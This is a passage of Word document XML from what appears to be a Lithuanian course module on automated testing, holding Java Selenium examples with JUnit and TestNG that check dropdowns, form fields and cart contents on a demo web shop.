      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">        String listElement = driver.findElement(By.id("wishlist-total")).getText();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">        Assert.assertEquals("Element name is: ", "Wish List (0)", listElement);</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driver.findElement(By.linkText("Register")).click();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">        Select dropDown = new Select(driver.findElement(By.id("input-country")));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">        dropDown.selectByVisibleText("Seychelles");</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String countryName = dropDown.getFirstSelectedOption().getText();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">        assertThat(countryName, is("Seychelles"));</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dropDown.selectByIndex(4);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        String secondCountryName = dropDown.getFirstSelectedOption().getText();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">        assertThat(secondCountryName, containsString("Algeria"));</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dropDown.selectByValue("4");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">        String thirdCountryName = dropDown.getFirstSelectedOption().getText();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">        assertThat(thirdCountryName, is(equalTo("American Samoa")));</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boolean passwordElement = driver.findElement(By.id("input-password")).isEnabled();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">        Assert.assertTrue("Is Password field enabled: ", passwordElement);</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boolean cartElement = driver.findElement(By.id("cart")).isDisplayed();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">        assertThat(cartElement, is(not(false)));</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boolean agreeElement = driver.findElement(By.name("agree")).isSelected();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">        Assert.assertFalse("Is Agree checkbox selected: ", agreeElement);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">        driver.close();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00985127" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2.3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> Mokymosi rezultatas. Kurti automatinius testus naudojant bibliotekas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00985127" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>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JUNIT FUNKCIJŲ NAUDOJIMAS</w:t>
      </w:r>
      <w:r w:rsidR="006F5BAF">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85729D" w:rsidRPr="00AD4464" w:rsidRDefault="0085729D"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642" w:name="_Toc14392834"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public class MyTest {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="64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3" w:name="_Toc14392835"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>private WebDriver driver = new ChromeDriver();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="643"/>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44" w:name="_Toc14392836"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>@Before</w:t>
            </w:r>
            <w:bookmarkEnd w:id="64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5" w:name="_Toc14392837"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public void setUp () {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="64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6" w:name="_Toc14392838"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.get("http://vps351.minehost.lt/new/");</w:t>
            </w:r>
            <w:bookmarkEnd w:id="64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7" w:name="_Toc14392839"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="647"/>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48" w:name="_Toc14392840"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>@After</w:t>
            </w:r>
            <w:bookmarkEnd w:id="64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49" w:name="_Toc14392841"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public void closeBrowser () {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="649"/>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0" w:name="_Toc14392842"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.close();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="65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1" w:name="_Toc14392843"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="651"/>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52" w:name="_Toc14392844"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>@Test</w:t>
            </w:r>
            <w:bookmarkEnd w:id="65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3" w:name="_Toc14392845"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public void goodThreadSleepTest () throws InterruptedException {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="65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4" w:name="_Toc14392846"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.findElement(By.xpath("//a[text()='Desktops']")).click();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="65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5" w:name="_Toc14392847"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.findElement(By.xpath("//a[text()='Show All Desktops']")).click();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="65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6" w:name="_Toc14392848"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>waitForJavascript(driver);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="656"/>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7" w:name="_Toc14392849"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>addToCart(driver, "iPhone", "MacBook", "Sony VAIO");</w:t>
            </w:r>
            <w:bookmarkEnd w:id="65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8" w:name="_Toc14392850"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Assert.assertTrue(driver.findElement(By.id("cart-total")).getText().contains("3 item(s)"));</w:t>
            </w:r>
            <w:bookmarkEnd w:id="65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59" w:name="_Toc14392851"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>removeAllItemsFromCart(driver);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="65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0" w:name="_Toc14392852"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Assert.assertTrue(driver.findElement(By.id("cart-total")).getText().contains("0 item(s)"));</w:t>
            </w:r>
            <w:bookmarkEnd w:id="66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1" w:name="_Toc14392853"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="661"/>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2" w:name="_Toc14392854"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>private static void addToCart (WebDriver driver, String...names) throws InterruptedException {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="66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3" w:name="_Toc14392855"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>for (String name : names) {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="66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4" w:name="_Toc14392856"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>List&lt;WebElement&gt; products = driver.findElements(By.xpath("//div[contains(@class, 'product-layout')]"));</w:t>
            </w:r>
            <w:bookmarkEnd w:id="66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5" w:name="_Toc14392857"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>for (WebElement product : products) {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="66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6" w:name="_Toc14392858"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>if (product.findElement(By.tagName("h4")).getText().equals(name)) {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="66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7" w:name="_Toc14392859"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>product.findElement(By.tagName("button")).click();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="66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8" w:name="_Toc14392860"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>waitForJavascript(driver);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="66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69" w:name="_Toc14392861"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="66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0" w:name="_Toc14392862"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="67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lastRenderedPageBreak/>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:bookmarkStart w:id="671" w:name="_Toc14392863"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="67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2" w:name="_Toc14392864"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="672"/>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3" w:name="_Toc14392865"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>private static void removeAllItemsFromCart (WebDriver driver){</w:t>
            </w:r>
            <w:bookmarkEnd w:id="67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4" w:name="_Toc14392866"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>List&lt;WebElement&gt; cartItems = driver.findElements(By.xpath("//table[@class='table table-striped']/tbody/tr"));</w:t>
            </w:r>
            <w:bookmarkEnd w:id="67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5" w:name="_Toc14392867"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>for (int i = 0; i &lt; cartItems.size(); i++) {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="67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6" w:name="_Toc14392868"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>openCart(driver);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="67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7" w:name="_Toc14392869"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.findElement(By</w:t>
            </w:r>
            <w:bookmarkEnd w:id="67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8" w:name="_Toc14392870"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>.xpath("//table[@class='table table-striped']/tbody/tr[1]/td[5]/button[@class='btn btn-danger btn-xs']"))</w:t>
            </w:r>
            <w:bookmarkEnd w:id="67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79" w:name="_Toc14392871"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>.click();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="67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0" w:name="_Toc14392872"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>waitForJavascript(driver);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="68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1" w:name="_Toc14392873"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="68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2" w:name="_Toc14392874"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="682"/>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683" w:name="_Toc14392875"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="683"/>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513392" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>TEST</w:t>
      </w:r>
      <w:r w:rsidR="006E7E80" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>NG FUNKCIJŲ NAUDOJIMAS</w:t>
      </w:r>
      <w:r w:rsidR="001B5D12">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1B5D12" w:rsidRPr="00AD4464" w:rsidRDefault="001B5D12"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684" w:name="_Toc14392876"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public class MyTest {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="68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5" w:name="_Toc14392877"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>WebDriver driver = new FirefoxDriver();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="685"/>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86" w:name="_Toc14392878"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>@BeforeMethod(groups = { "Test Group" })</w:t>
            </w:r>
            <w:bookmarkEnd w:id="68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7" w:name="_Toc14392879"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public void openBrowser() {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="68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8" w:name="_Toc14392880"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.get("website link");</w:t>
            </w:r>
            <w:bookmarkEnd w:id="68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89" w:name="_Toc14392881"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>System.out.println("Begin test");</w:t>
            </w:r>
            <w:bookmarkEnd w:id="68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0" w:name="_Toc14392882"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="690"/>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91" w:name="_Toc14392883"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>@AfterMethod(groups = { "Test Group" })</w:t>
            </w:r>
            <w:bookmarkEnd w:id="69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2" w:name="_Toc14392884"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public void closeBrowser() {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="69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3" w:name="_Toc14392885"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.close();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="69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4" w:name="_Toc14392886"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>System.out.println("End test");</w:t>
            </w:r>
            <w:bookmarkEnd w:id="69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5" w:name="_Toc14392887"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="695"/>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696" w:name="_Toc14392888"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>@BeforeTest</w:t>
            </w:r>
            <w:bookmarkEnd w:id="69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7" w:name="_Toc14392889"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public static void beforeClassText() {</w:t>
            </w:r>
